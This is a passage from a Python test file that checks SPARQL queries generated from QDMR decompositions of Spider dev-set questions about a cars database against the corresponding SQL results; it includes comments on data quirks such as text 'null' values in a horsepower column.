WHERE
{
{
SELECT ?countries
WHERE
{
?Country arc:car_makers:Country:countries:CountryId ?countries.
?car_makers arc:car_makers:Country ?Country.
}
GROUP BY ?countries
}
?countries arc:countries:CountryName ?CountryName.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# FILTER['#1', 'with car maker']
# PROJECT['names of #REF', '#2']
# PROJECT['ids of #REF', '#2']
# UNION['#3', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_table_grounding("countries")
grounding[GroundingIndex(1,1,"with car maker")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(2,0,"names of #REF")] = GroundingKey.make_column_grounding("countries", "CountryName")
grounding[GroundingIndex(3,0,"ids of #REF")] = GroundingKey.make_column_grounding("countries", "CountryId")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev129(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 129
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which countries in europe have at least 3 car manufacturers?
# sql_query:
# SELECT T1.CountryName
# FROM COUNTRIES AS T1 JOIN CONTINENTS AS T2 ON T1.Continent = T2.ContId JOIN CAR_MAKERS AS T3 ON T1.CountryId = T3.Country
# WHERE T2.Continent = 'europe'
# GROUP BY T1.CountryName
# HAVING count(*) >= 3;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?CountryName
WHERE
{
?countries arc:countries:CountryName ?CountryName.
?countries arc:countries:Continent ?Continent_1.
?Continent_1 arc:countries:Continent:continents:ContId ?continents.
?continents arc:continents:Continent ?Continent.
FILTER(?Continent = "europe").
{
SELECT ?CountryName (count(?car_makers) AS ?count)
WHERE
{
?countries_1 arc:countries:CountryName ?CountryName.
?countries_1 arc:countries:Continent ?Continent_3.
?Continent_3 arc:countries:Continent:continents:ContId ?continents_1.
?continents_1 arc:continents:Continent ?Continent_2.
FILTER(?Continent_2 = "europe").
?Country arc:car_makers:Country:countries:CountryId ?countries_1.
?car_makers arc:car_makers:Country ?Country.
}
GROUP BY ?CountryName
}
FILTER(?count >= 3.0).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['countries']
# FILTER['#1', 'in europe']
# PROJECT['car manufacturers in #REF', '#2']
# GROUP['count', '#3', '#2']
# COMPARATIVE['#2', '#4', 'is at least 3']
grounding = {}
grounding[GroundingIndex(0,0,"countries")] = GroundingKey.make_column_grounding("countries", "CountryName")
grounding[GroundingIndex(1,1,"in europe")] = GroundingKey.make_value_grounding("continents", "Continent", "europe")
grounding[GroundingIndex(2,0,"car manufacturers in #REF")] = GroundingKey.make_table_grounding("car_makers")
grounding[GroundingIndex(4,2,"is at least 3")] = GroundingKey.make_comparative_grounding(">=", "3")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev132(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_compare_to_sparql(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 132
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the largest amount of horsepower for the models with 3 cylinders and what make is it ?
# sql_query:
# SELECT T2.horsepower , T1.Make
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.cylinders = 3
# ORDER BY T2.horsepower DESC LIMIT 1;
correct_sparql_query = textwrap.dedent("""\
SELECT ?max_2 ?Make
WHERE
{
{
SELECT ?car_names_1
WHERE
{
{
SELECT ?car_names_1
WHERE
{
?cars_data_2 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_2 arc:cars_data:Cylinders ?Cylinders_1.
FILTER(?Cylinders_1 = 3).
}
GROUP BY ?car_names_1
}
?cars_data_3 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_3 arc:cars_data:Horsepower ?Horsepower_1.
{
SELECT (max(?Horsepower_2) AS ?max_1)
WHERE
{
{
SELECT ?car_names_2
WHERE
{
?cars_data_4 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_4 arc:cars_data:Cylinders ?Cylinders_2.
FILTER(?Cylinders_2 = 3).
}
GROUP BY ?car_names_2
}
?cars_data_5 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_5 arc:cars_data:Horsepower ?Horsepower_2.
}
}
FILTER(?Horsepower_1 = ?max_1).
}
GROUP BY ?car_names_1
}
?car_names_1 arc:car_names:Make ?Make.
{
SELECT (max(?Horsepower_3) AS ?max_2)
WHERE
{
{
SELECT ?car_names_3
WHERE
{
?cars_data_6 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_6 arc:cars_data:Cylinders ?Cylinders_3.
FILTER(?Cylinders_3 = 3).
}
GROUP BY ?car_names_3
}
?cars_data_7 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_7 arc:cars_data:Horsepower ?Horsepower_3.
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_column_grounding("cars_data", "Horsepower")), "max"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_names", "Make"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# 1: SELECT['models']
# 2: FILTER['#1', 'with 3 cylinders']
# 3: PROJECT['horsepowers of #REF', '#2']
# 4: AGGREGATE['max', '#3']
# 5: COMPARATIVE['#2', '#3', 'is #4']
# 6: PROJECT['the make of #REF', '#5']
# 7: UNION['#4', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_table_grounding("car_names")
# WRONG grounding:
# grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(1,1,"with 3 cylinders")] = GroundingKey.make_comparative_grounding("=", "3", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,0,"horsepowers of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower") # GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is #4")] = GroundingKey.make_comparative_grounding("=", "#4")
grounding[GroundingIndex(5,0,"the make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_compare_to_sql(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 132
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the largest amount of horsepower for the models with 3 cylinders and what make is it ?
# sql_query:
# SELECT T2.horsepower , T1.Make
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.cylinders = 3
# ORDER BY T2.horsepower DESC LIMIT 1;
# Rewriting this query's "ORDER BY T2.horsepower DESC LIMIT 1" as an argmax construction
sql_query = textwrap.dedent("""\
SELECT T2.horsepower , T1.Make
FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
WHERE T2.cylinders = 3
AND
T2.horsepower = (
SELECT max(T2.horsepower)
FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
WHERE T2.cylinders = 3
)
""")
correct_sparql_query = textwrap.dedent("""\
SELECT ?max_2 ?Make
WHERE
{
{
SELECT ?car_names_1
WHERE
{
{
SELECT ?car_names_1
WHERE
{
?cars_data_2 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_2 arc:cars_data:Cylinders ?Cylinders_1.
FILTER(?Cylinders_1 = 3).
}
GROUP BY ?car_names_1
}
?cars_data_3 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_3 arc:cars_data:Horsepower ?Horsepower_1.
{
SELECT (max(?Horsepower_2) AS ?max_1)
WHERE
{
{
SELECT ?car_names_2
WHERE
{
?cars_data_4 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_4 arc:cars_data:Cylinders ?Cylinders_2.
FILTER(?Cylinders_2 = 3).
}
GROUP BY ?car_names_2
}
?cars_data_5 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_5 arc:cars_data:Horsepower ?Horsepower_2.
}
}
FILTER(?Horsepower_1 = ?max_1).
}
GROUP BY ?car_names_1
}
?car_names_1 arc:car_names:Make ?Make.
{
SELECT (max(?Horsepower_3) AS ?max_2)
WHERE
{
{
SELECT ?car_names_3
WHERE
{
?cars_data_6 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_6 arc:cars_data:Cylinders ?Cylinders_3.
FILTER(?Cylinders_3 = 3).
}
GROUP BY ?car_names_3
}
?cars_data_7 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_7 arc:cars_data:Horsepower ?Horsepower_3.
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_column_grounding("cars_data", "Horsepower")), "max"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_names", "Make"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# 1: SELECT['models']
# 2: FILTER['#1', 'with 3 cylinders']
# 3: PROJECT['horsepowers of #REF', '#2']
# 4: AGGREGATE['max', '#3']
# 5: COMPARATIVE['#2', '#3', 'is #4']
# 6: PROJECT['the make of #REF', '#5']
# 7: UNION['#4', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_table_grounding("car_names")
# WRONG grounding:
# grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(1,1,"with 3 cylinders")] = GroundingKey.make_comparative_grounding("=", "3", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,0,"horsepowers of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower") # GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is #4")] = GroundingKey.make_comparative_grounding("=", "#4")
grounding[GroundingIndex(5,0,"the make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderDev135(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "dev"
# i_query = 135
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # question: What is the average horsepower of the cars before 1980?
# # sql_query: SELECT avg(horsepower) FROM CARS_DATA WHERE YEAR < 1980;
# # CAUTION! the column to be averaged has "null" written in it - SQL substitutes 0 for it
# # Is it even a proper NULL or just text?
# # According to https://www.sqlservercentral.com/articles/gotcha-sql-aggregate-functions-and-null
# # SQL is supposed to ignore NULL, but something else happens here
# # correct_sparql_query = textwrap.dedent("""\
# # SELECT (avg(?Horsepower) AS ?avg)
# # WHERE
# # {
# # ?cars_data arc:cars_data:Id ?cars_data.
# # ?cars_data arc:cars_data:Year ?Year.
# # FILTER(?Year < 1980.0).
# # ?cars_data arc:cars_data:Horsepower ?Horsepower.
# # }""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# # break_program:
# # SELECT['cars']
# # FILTER['#1', 'before 1980']
# # PROJECT['horsepower of #REF', '#2']
# # AGGREGATE['avg', '#3'
# grounding = {}
# grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
# grounding[GroundingIndex(1,1,"before 1980")] = GroundingKey.make_comparative_grounding("<", "1980", GroundingKey.make_column_grounding("cars_data", "Year"))
# grounding[GroundingIndex(2,0,"horsepower of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=False,
# return_message=True)
# self.assertTrue(equal, message)
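# A minimal standalone sketch (illustration only, not part of the test suite) of
# the NULL gotcha discussed in the disabled test above: SQLite's avg() skips a
# proper NULL, but a TEXT column holding the literal string "null" coerces it to
# 0 inside the aggregate, silently dragging the average down.
def _demo_sqlite_avg_null_vs_text_null():
    import sqlite3
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars_data (Horsepower TEXT)")
    conn.executemany("INSERT INTO cars_data VALUES (?)",
                     [("100",), (None,), ("null",)])
    # The proper NULL is ignored; "null" coerces to 0, so the result is
    # (100 + 0) / 2 = 50.0 rather than 100.0.
    return conn.execute("SELECT avg(Horsepower) FROM cars_data").fetchone()[0]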
class TestSpiderDev138(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 138
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the average edispl for all volvos?
# sql_query: SELECT avg(T2.edispl) FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id WHERE T1.Model = 'volvo';
correct_sparql_query = textwrap.dedent("""\
SELECT (avg(?Edispl) AS ?avg)
WHERE
{
?car_names arc:car_names:Model ?Model.
FILTER(?Model = key:car_names:Model:volvo).
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?cars_data arc:cars_data:Edispl ?Edispl.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['volvos']
# PROJECT['edispl of #REF', '#1']
# AGGREGATE['avg', '#2']
grounding = {}
grounding[GroundingIndex(0,0,"volvos")] = GroundingKey.make_value_grounding("car_names", "Model", "volvo")
grounding[GroundingIndex(1,0,"edispl of #REF")] = GroundingKey.make_column_grounding("cars_data", "Edispl")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev141(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 141
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which model has the most version(make) of cars?
# sql_query:
# SELECT Model
# FROM CAR_NAMES
# GROUP BY Model
# ORDER BY count(*) DESC LIMIT 1;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?Model_2
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?Model_1 (count(?Make) AS ?count)
WHERE
{
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
?car_names arc:car_names:Make ?Make.
}
GROUP BY ?Model_1
}
}
}
?model_list_1 arc:model_list:Model ?Model_2.
{
SELECT ?Model_2 (count(?Make_1) AS ?count_1)
WHERE
{
?model_list_2 arc:model_list:Model ?Model_2.
?Model_3 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_3.
?car_names_1 arc:car_names:Make ?Make_1.
}
GROUP BY ?Model_2
}
FILTER(?count_1 = ?max).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# SELECT['models']
# PROJECT['version of #REF', '#1']
# GROUP['count', '#3', '#2']
# SUPERLATIVE['max', '#2', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("model_list")
# The corresponding columns are related via a foreign key: substitute one for the other to simplify
# grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,0,"version of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_foreign_key_output_match(self):
"""Test an entry from spider dataset: columns is the output should be matched as foreign keys
"""
split_name = "dev"
i_query = 141
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which model has the most version(make) of cars?
# sql_query:
# SELECT Model
# FROM CAR_NAMES
# GROUP BY Model
# ORDER BY count(*) DESC LIMIT 1;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?Model_2
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?Model_1 (count(?Make) AS ?count)
WHERE
{
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
?car_names arc:car_names:Make ?Make.
}
GROUP BY ?Model_1
}
}
}
?model_list_1 arc:model_list:Model ?Model_2.
{
SELECT ?Model_2 (count(?Make_1) AS ?count_1)
WHERE
{
?model_list_2 arc:model_list:Model ?Model_2.
?Model_3 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_3.
?car_names_1 arc:car_names:Make ?Make_1.
}
GROUP BY ?Model_2
}
FILTER(?count_1 = ?max).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# SELECT['models']
# PROJECT['version of #REF', '#1']
# GROUP['count', '#3', '#2']
# SUPERLATIVE['max', '#2', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("model_list")
# The corresponding columns are related via a foreign key - this case needs special processing
grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(2,0,"version of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev144(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 144
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the number of cars with more than 4 cylinders?
# sql_query: SELECT count(*) FROM CARS_DATA WHERE Cylinders > 4
correct_sparql_query = textwrap.dedent("""\
SELECT (count(?cars) AS ?count)
WHERE
{
?cars arc:cars_data:Cylinders ?Cylinders.
FILTER(?Cylinders > 4).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['cylinders of #REF', '#1']
# GROUP['count', '#2', '#1']
# COMPARATIVE['#1', '#3', 'is higher than 4']
# AGGREGATE['count', '#4']
#
# Note: this QDMR does not correspond well to the schema - the column Cylinders actually stores the number of cylinders
# we are going to fix this using the grounding of the group op
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"cylinders of #REF")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(2,0,"count")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(3,2,"is higher than 4")] = GroundingKey.make_comparative_grounding(">", "4")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev151(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 151
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# sql_query:
# SELECT DISTINCT T2.Model
# FROM CAR_NAMES AS T1 JOIN MODEL_LIST AS T2 ON T1.Model = T2.Model JOIN CAR_MAKERS AS T3 ON T2.Maker = T3.Id JOIN CARS_DATA AS T4 ON T1.MakeId = T4.Id
# WHERE T3.FullName = 'General Motors' OR T4.weight > 3500;
# question: Which distinctive models are produced by maker with the full name General Motors or weighing more than 3500?
# CAUTION: SQL is wrong on the current database!
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Model_2
WHERE
{
{
SELECT ?Model_2
WHERE
{
?model_list_1 arc:model_list:Model ?Model_2.
?model_list_1 arc:model_list:Maker ?Maker_1.
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers_1.
?car_makers_1 arc:car_makers:FullName ?FullName_1.
FILTER(?FullName_1 = "General Motors").
}
GROUP BY ?Model_2
}
UNION
{
SELECT ?Model_2
WHERE
{
?Model_4 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_4.
?cars_data_1 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_1 arc:cars_data:Weight ?Weight_1.
FILTER(?Weight_1 > 3500).
}
GROUP BY ?Model_2
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("model_list", "Model"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['distinctive models']
# FILTER['#1', 'which are produced by maker with the full name General Motors']
# FILTER['#1', 'weighing more than 3500']
# UNION['#2', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"distinctive models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(1,1,"which are produced by maker with the full name General Motors")] = GroundingKey.make_value_grounding("car_makers", "FullName", "General Motors")
grounding[GroundingIndex(2,1,"weighing more than 3500")] = GroundingKey.make_comparative_grounding(">", "3500", GroundingKey.make_column_grounding("cars_data", "Weight"))
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev157(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 157
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: For model volvo, how many cylinders does the car with the least accelerate have?
# sql_query:
# SELECT T1.cylinders FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId WHERE T2.Model = 'volvo' ORDER BY T1.accelerate ASC LIMIT 1;
correct_sparql_query = textwrap.dedent("""\
SELECT ?Cylinders
WHERE
{
{
SELECT ?cars_data_1
WHERE
{
{
SELECT (min(?Accelerate) AS ?min)
WHERE
{
{
SELECT ?cars_data
WHERE
{
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?car_names arc:car_names:Model ?Model.
FILTER(?Model = key:car_names:Model:volvo).
}
GROUP BY ?cars_data
}
?cars_data arc:cars_data:Accelerate ?Accelerate.
}
}
{
SELECT ?cars_data_1
WHERE
{
?cars_data_1 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?car_names_1 arc:car_names:Model ?Model_1.
FILTER(?Model_1 = key:car_names:Model:volvo).
}
GROUP BY ?cars_data_1
}
?cars_data_1 arc:cars_data:Accelerate ?Accelerate_1.
FILTER(?Accelerate_1 = ?min).
}
GROUP BY ?cars_data_1
}
?cars_data_1 arc:cars_data:Cylinders ?Cylinders.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['cars']
# #2: PROJECT['models of #REF', '#1']
# #3: COMPARATIVE['#1', '#2', 'is volvo']
# #4: PROJECT['accelerate of #REF', '#3']
# #5: SUPERLATIVE['min', '#3', '#4']
# #6: PROJECT['cylinders of #REF', '#5']
# #7: AGGREGATE['count', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,'models of #REF')] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,2,"is volvo")] = GroundingKey.make_comparative_grounding("=", "volvo", GroundingKey.make_column_grounding("car_names", "Model"))
grounding[GroundingIndex(3,0,'accelerate of #REF')] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(4,0,"min")] = GroundingKey.make_comparative_grounding("min", "None")
grounding[GroundingIndex(5,0,"'cylinders of #REF'")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(6,0,"count")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev159(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 159
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: How many cars have a larger accelerate than the car with the largest horsepower?
# sql_query:
# SELECT COUNT(*) FROM CARS_DATA WHERE Accelerate > ( SELECT Accelerate FROM CARS_DATA ORDER BY Horsepower DESC LIMIT 1 );
# the query produces incorrect results because the column Horsepower is of type TEXT and has the text "null" written in it
# to test the feature I'm swapping Horsepower for Weight
correct_sparql_query = textwrap.dedent("""\
SELECT (count(?cars_data_2) AS ?count)
WHERE
{
{
SELECT (max(?Weight) AS ?max)
WHERE
{
?cars_data_1 arc:cars_data:Weight ?Weight.
}
}
?cars_data arc:cars_data:Weight ?Weight_1.
FILTER(?Weight_1 = ?max).
?cars_data arc:cars_data:Accelerate ?Accelerate.
